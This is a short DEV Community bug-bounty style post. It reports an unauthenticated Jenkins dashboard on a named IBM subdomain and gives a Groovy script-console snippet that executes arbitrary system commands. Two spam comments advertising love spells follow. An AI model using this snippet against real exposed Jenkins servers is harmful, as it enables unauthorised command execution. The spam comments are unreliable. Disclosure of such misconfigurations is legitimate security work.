DEV Community

Cover image for Remote Code Execution on ibm.com subdomain
Khaled Nassar
Khaled Nassar

Posted on

4 1

Remote Code Execution on ibm.com subdomain

i've found Jenkins on acc11-blr-dev-01.sl1694431.sl.edst.ibm.com does not require authentication for access dashboard

what can i do with this .?


everything , add/delete admin accounts,service,configuration,etc ..

but the intersing path is /script , you can write Jenkins script
so you can write script for execute system commands

def command = "YOUR_COMMAND"
def proc = command.execute()
proc.waitFor()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"
Enter fullscreen mode Exit fullscreen mode

Thanks

Top comments (2)

Collapse
 
donnalnman profile image
DonnaLnman

Remote code execution is a cyber-attack in which an attacker can execute commands remotely on another person's computing device. RCEs are usually caused by malicious malware downloaded by the host Spells to make him love you forever

Collapse
 
freyapachl1 profile image
FreyaPachl

Remote code execution is usually accomplished by spawning a remote command shell that allows the attacker to execute operating system commands on the target system. Make someone miss you spell

Billboard image

Create up to 10 Postgres Databases on Neon's free plan.

If you're starting a new project, Neon has got your databases covered. No credit cards. No trials. No getting in your way.

Try Neon for Free →

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay